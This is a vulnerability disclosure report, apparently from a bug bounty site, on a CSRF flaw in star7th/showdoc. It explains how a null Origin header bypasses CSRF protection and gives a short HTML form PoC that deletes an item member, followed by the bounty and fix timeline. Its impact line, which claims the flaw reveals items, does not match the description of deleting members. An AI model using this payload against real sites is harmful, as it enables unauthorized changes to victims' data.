Cross-Site Request Forgery (CSRF) in star7th/showdoc


Reported on

Sep 6th 2021

✍️ Description

With CSRF vulnerability Attacker able to delete any member to of any item if users visit attacker website.

We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to null and we can bypass CSRF protection.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari. you can check that member with email address test that already registered before for item with item_id 1531601670203344 will be deleted.

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="item&#95;id" value="1531601670203344" />
      <input type="hidden" name="item&#95;member&#95;id" value="187133" />
      <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of reveal any item.


Set SameSite attribute of cookies to Lax or Strict.

We have contacted a member of the star7th/showdoc team and are waiting to hear back 3 months ago
star7th validated this vulnerability 3 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome
3 months ago


@maintainer - can we please confirm the fix for this report, and then we can go ahead and publish the CVE with the patch.

star7th confirmed that a fix has been merged on 67093c 2 months ago
star7th has been awarded the fix bounty